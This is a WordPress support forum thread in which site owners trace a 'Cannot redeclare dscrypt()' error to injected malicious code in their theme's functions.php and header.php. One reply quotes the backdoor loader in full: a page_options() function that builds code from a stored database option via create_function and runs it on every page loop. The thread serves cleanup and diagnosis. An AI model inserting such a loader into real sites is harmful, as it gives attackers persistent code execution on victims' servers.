Updated to 3.3.1 now getting Fatal error: Cannot redeclare dscrypt() message

I did not do the installation of the wordpress site I’m working with. So I am not familiar with what should and shouldn’t be there.

BUT I too am having the error of the OP and I too have scary looking code. Have I been hacked?

[Code moderated as per the Forum Rules. The maximum number of lines of code that you can post in these forums is ten lines. Please use the pastebin]

I deleted the counter code and now the site is working again. It does seem to be a piece of malignant code: Things like SERVER[‘REMOTE_ADDR’] and hash codes being sent through something that decrypts looks pretty evil.

So I’m assuming that even if my site is temporarily working, that I will need to rebuild the database and themes files with a fresh install WP. Right?

sharonmiranda, I removed the code and now my site works fine as well. I also took out that weird code under the wordpress counter. I’ve now checked my site using sitecheck and nothing shows up in terms of viruses/bugs. Do you guys recommend looking into this more or is it just a matter of those two bits of code?

That code is a hack using the thumbs.php, a vulnerable file.

This article explains it all, and what to do. I took every step. Whew ! Only took two days to discover the issue. So many potential solutions out there, none did it but this bit of knowledge.

https://davemeehan.com/technology/wordpress-install-hacked-again-with-page_options-function-and-references-to-kadaffizzet-com

Similar problem i’m having:

Fatal error: Cannot redeclare dsCrypt() (previously declared in /home/inst/public_html/wp-content/themes/themorningafter/functions.php(30) : runtime-created function(1) : eval()’d code:24) in /home/inst/public_html/wp-content/themes/themorningafter/functions.php(30) : runtime-created function(1) : eval()’d code on line 67

I checked the functions.php line 30 and it seems fine not sure where to go from here?

[SOLVED]
I checked the functions.php file thoroughly again and realized that at the very bottom of it there were these lines of code:

<?php function page_options() { $option = get_option(‘page_option’); $opt=unserialize($option);
@$arg = create_function(”, $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg(”);}
add_action(‘loop_start’, ‘page_options’); ?>

I had to remove it, seem like a hack LOL.

Hello, damian_luv, is that code supposed to be there? I have a client with a similar situation.

No thirdshiftguy, that code is a hack remove it.

Hi,
I’ve just found this thread from doing a Google search on the error code my website is showing. For someone who has limited technical skills is there an easy way to find / remove the problem? Is this likely to be a new vulnerability with WordPress or a problem with my hosting?

Running Sitecheck brings up a number of issues on various pages – the site is <ahref=”https://www.boothstar.co.uk”>www.boothstar.co.uk

corinnel show me what is at line 130 in your header.php file also what is on line 31 of functions.php.

I would bet it’s the same issue.

Hi damian_luv… many thanks for your quick response!
I’ve logged into WordPress to view the file but it doesn’t give any numbers as to the various lines. That said, there is code at the bottom between Worpress Counter. I’ll check the functions.php file now.

You can ftp and download the file and use notepadd++ to view it with line numbers.

Yes it looks like what is mentioned above… I hope I/ve pasted this correct to Pastebin – https://pastebin.com/C2sfvasV
Would I be correct in thinking it’s as simple as removing the code?

Delete everything after ?> ondown ok, or you can comment the entire thing out. That function page_options() is the prob.

Really appreciate your help… with the header file do I need to just remove the WordPress counters and the bits between in. The bottom of the file is as https://pastebin.com/S7M1bWB0